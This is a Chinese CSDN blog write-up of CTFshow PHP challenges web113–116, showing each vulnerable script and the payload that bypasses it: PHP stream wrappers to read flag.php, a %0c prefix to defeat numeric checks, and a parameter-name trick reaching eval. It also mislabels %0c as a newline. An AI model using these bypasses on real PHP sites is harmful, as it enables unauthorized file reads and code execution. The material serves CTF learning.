CTFshow web(php特性113-115&123)

最新推荐文章于 2024-07-15 17:01:50 发布
最新推荐文章于 2024-07-15 17:01:50 发布
阅读量2.3k 收藏 26
点赞数 62
文章标签: php 开发语言 ctfshow web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csjjjd/article/details/136046547
版权
文章讲述了PHP中文件包含函数的安全隐患,通过示例展示了如何利用漏洞进行payload传递,包括绕过过滤器、利用字符串替换漏洞和命令执行漏洞获取flag。作者强调了理解和审计代码逻辑在解决此类问题中的重要性。
摘要由CSDN通过智能技术生成

                                                                web113

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-30 23:47:52

*/

highlight_file(__FILE__);
error_reporting(0);
function filter($file){
    if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){
        die('hacker!');
    }else{
        return $file;
    }
}
$file=$_GET['file'];
if(! is_file($file)){
    highlight_file(filter($file));
}else{
    echo "hacker!";
}

这道题目如果做不出来说明你文件包含那边学的不够好,可以看看我之前写的一篇文章,可以高效提升这方面的知识

文件包含提升-CSDN博客

这是几个月前的文章了,一五一十的把payload送到了嘴边,直接抄就好,其实就是一个最简单的压缩过滤器

?file=compress.zlib://flag.php

                                                                        web114

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-01 15:02:53

*/

error_reporting(0);
highlight_file(__FILE__);
function filter($file){
    if(preg_match('/compress|root|zip|convert|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){
        die('hacker!');
    }else{
        return $file;
    }
}
$file=$_GET['file'];
echo "师傅们居然tql都是非预期 哼!";
if(! is_file($file)){
    highlight_file(filter($file));
}else{
    echo "hacker!";
}

这道题目没有禁用filter,那就直接拿下了

payload:?file=php://filter/resource=flag.php

但是这里把convert搬了,那就不要转换器直接返璞归真

                                                                        web115

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-01 15:08:19

*/

include('flag.php');
highlight_file(__FILE__);
error_reporting(0);
function filter($num){
    $num=str_replace("0x","1",$num);
    $num=str_replace("0","1",$num);
    $num=str_replace(".","1",$num);
    $num=str_replace("e","1",$num);
    $num=str_replace("+","1",$num);
    return $num;
}
$num=$_GET['num'];
if(is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36'){
    if($num=='36'){
        echo $flag;
    }else{
        echo "hacker!!";
    }
}else{
    echo "hacker!!!";

小科普:

在 PHP 中,trim() 函数是用于去除字符串开头和结尾的空白字符(包括空格、制表符、换行符等)的函数。它接受一个字符串作为参数,并返回去除空白字符后的新字符串。

trim() 函数的语法如下:

trim(string $str, string $characters = " \t\n\r\0\x0B"): string

  • $str:要处理的字符串。
  • $characters(可选):指定要去除的字符集合,默认为空格、制表符、换行符、回车符等常见的空白字符。

示例使用:

$str = " Hello, World! "; $trimmedStr = trim($str); echo $trimmedStr; // 输出: "Hello, World!"

这个函数通常用于处理用户输入的字符串,以确保不会因为开头或结尾的空白字符而导致不必要的问题。

这里最主要有一个大漏洞,看到了就应该立刻反应过来了!

代码中存在一个漏洞,使用了一个不准确的数值过滤函数 filter()

在 filter() 函数中,使用了一系列的字符串替换操作来替换字符串中的特定字符。然而,这种过滤方式是不准确的,可以被绕过。

在输入 ?num=%0c36 的情况下,%0c 是回车换行符的 URL 编码形式。由于 filter() 函数中没有处理回车换行符的情况,因此替换操作不会影响回车换行符。

payload:?num=%0c36 

                                                                        web116

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?/", $c)&&$c<=18){
         eval("$c".";");  
         if($fl0g==="flag_give_me"){
             echo $flag;
         }
    }
}
?>

这里开始小小审计一下代码

代码分析:

记住!!!!!

不管什么类型的PHP过滤题目,最最最重要的就一点,搞清楚我要干啥!搞清楚我要干啥!搞清楚我要干啥!重要的事说三遍!

根据代码逻辑,对于获取flag的条件,需要满足以下几个条件:

  • CTF_SHOW 必须存在
  • CTF_SHOW.COM 必须存在
  • fun 不能包含特殊字符
  • fun 值必须小于等于 18
  • $fl0g 必须等于 "flag_give_me"

如果看不出来这个,学再多技巧绕过也没有用,不过有没有人发现这里有坑点啊,$fl0g 必须等于 "flag_give_me"这里我根本就没有经过GET或者POST上传,所以这条语句没用的,没有flag输出那就在别的参数通过命令执行找flag

那么我就只能在c上面找flag

payload:

POST: CTF_SHOW=&CTF[SHOW.COM=1&fun=echo $flag

或者:CTF_SHOW=1&CTF[SHOW.COM=2&fun=echo $flag

解释:

由于PHP8.0以下如果第一次出现类似于“[”这样的非法符号,会将第一个非法符号转化为下划线,第二个不会转,所以这里是变量出了问题,所以改一下就好了。

if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?/", $c)&&$c<=18){

我已经满足了两个if了,然后就拿到了执行eval的命令,那不直接eval flag等什么!还干什么傻傻看第三个if!!!

真诚地希望我的文章对大家有所帮助,谢谢!

补天阁
关注
CTFshow php特性 web113
Kradress的博客
12-16 589
目录源码思路题解解法一解法二总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-30 23:47:52 */ highlight_file(__FILE__); error_reporting(0); function filter($file){
CTFshow php特性 web115
Kradress的博客
12-16 309
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-01 15:08:19 */ include('flag.php'); highlight_file(__FILE__); error_reporting(0); function
ctfshow web入门 php特性 web113-web125
m0_62207170的博客
10-04 476
ctfshow web入门 php特性 web113-web125
ctfshow-web115(\f绕过is_numberic()+trim())
qq_44657899的博客
11-16 1199
<?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-01 15:08:19 */ include('flag.php'); highlight_file(__FILE__); error_reporting(0); function filter($num){ .
CTFSHOW PHP特性篇(中篇 111-131)
羽的博客
10-21 4933
web111 function getFlag(&$v1,&$v2){ eval("$$v1 = &$$v2;"); var_dump($$v1); } if(isset($_GET['v1']) && isset($_GET['v2'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow web97-100 php特性
qq_52671379的博客
03-28 564
ctfshow web97-php特性
CTFshow php特性 web141
Kradress的博客
12-18 590
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-17 19:28:09 */ #error_reporting(0); highlight_file(__FILE__); if(isset($_GET['v1']) && i
CTFshow web入门web82-文件包含5
weixin_74336671的博客
12-06 675
因为有die(与exit意思一样),导致即使我们成功写入一句话,也执行不了(这个过程在实战中十分常见,通常出现在缓存、配置文件等等地方,不允许用户直接访问的文件,都会被加上if(!$file是我们我们可控的协议流,我们使用base64编码,在解码时去掉退出代码中不支持的字符,变为phpdie,在后面加上aa使得能正常解码phpdieaa(base64编码解码特性,4字节一组)file_put_contents(urldecode($file), "<?php die('大佬别秀了');
ctfshow-web入门-php特性web109-web115
最新发布
Welcome To Myon'Blog !
07-15 1203
php 中查看目录的函数有:scandir()、golb()、dirname()、basename()、realpath()、getcwd() ,其中 scandir()、golb() 、dirname()、basename()、realpath() 都需要给定参数,而 getcwd() 不需要参数,getchwd() 函数会返回当前工作目录。对于 trim() 函数会去除空格( %20)、制表符(%09)、换行符(%0a)、回车符(%0d)、空字节符(%00)、垂直制表符(%0b),
113 php的位运算符不包括,php使用位与运算符【&】位或运算符【|】实现权限管理...
weixin_27058835的博客
03-29 156
权限值是这样的2^0=1,相应2进数为”0001″(在这里^我表示成”次方”,即:2的0次方,下同)2^1=2,相应2进数为”0010″2^2=4,相应2进数为”0100″2^3=8,相应2进数为”1000″要判断一个数在某些数范围内就可以使用 & 运算符(数值从上面的表中得来)如:7=4|2|1 (你也可以简单理解成7=4+2+1)用 & 来操作,可以知道7&4、7&am...
ctfshow学习记录-web入门(php特性109-115&123&125-126)
龟速更新的九某人
07-19 1446
ctfshow学习记录-web入门(php特性web109-115&web123&web125-126)
ctfshow php特性
weixin_63231007的博客
06-13 1475
web113 function filter($file){ if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){ die('hacker!'); }else{ return $file; } } $file=$_GET['file']; if(! is_file($file)){ highlight_file(filter($f
CTFshow--web入门--php特性(持续更新ing)
qq_46874275的博客
05-17 1374
~目录~开始web89 数组绕过web90 intval()特性web91 正则匹配web92 intval()特性web93 intval()特性web94 intval()特性 开始 web89 数组绕过 正则匹配 传数组会返回false ?num[]=0 web90 intval()特性 考察intval()的使用 绕过的姿势有很多 ?num=4476.0 web91 正则匹配 /i匹配的时候不区分大小写 m多行匹配,若存在换行\n并且有开始^或结束$符的情况下,将以换行为分隔符,逐行进行匹配 %
ctfshow web入门 PHP特性中篇(web105-web132)
ccfly1012的博客
09-11 1425
目录 web105 web106 web107 web108 web109 web110 web111 web112 web113 web114 web115 web123 web125 web126 web127 web128 web129 web130 web131 web132 web105 <?php ​ /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 1
CTFShow-PHP特性篇(一) (web89-web115)
lonmar的博客
12-03 2114
文章目录web89web90web91web92web93web94web95web96web97web98web99web100web 101 web89 数组绕过 原理: 且 preg_math()传入数组参数也会直接返回0 web90 ?num=0x117c 0x117c会转为4476 还是考察intval()函数 intval( mixed $var[, int $base = 10] ) : int var 要转换成 integer 的数量值 base 转化所使用的进制 Note: 如果
CTF中PHP相关题目考点总结(二)
HBohan的博客
02-16 3090
介绍 本篇文章主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点,这样的话比较容易理解。 PHP特性相关考点 一、 考点:php正则表达式的匹配模式差异。 例题: show_source(__FILE__); include('flag.php'); $a=$_GET['cmd']; if(preg_match('/^php$/im', $a)){ #/i表示不区分大小写,/m表示多行匹配 i.
ctfshow web133和其他命令执行的骚操作
Firebasky的博客
10-15 4760
这里是总结自己最近遇到的命令执行题,感觉还是不错分享出来。也欢迎师傅们评论一些骚操作 1. ISITDTU QUALS 2020 REC <?php // error_reporting(E_ALL); // ini_set('display_errors', '1'); function trigonometric_check($code) { // Check length if (strlen($code) >= 0x100) {//256长度 retu.
ctfshow web入门 php特性
Lum1n0us's Blog
02-18 2115
文章目录web89web90web91web92姿势一姿势二姿势三web93web94web95web96姿势一姿势二web97web98web99web100姿势一姿势二姿势三web101web102-103web104web105web106web107web108web109姿势一姿势二web110web111web112姿势一姿势二姿势三姿势四web113姿势一姿势二web114web115web123web125web126web127web128web129姿势一姿势二web130web131w
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值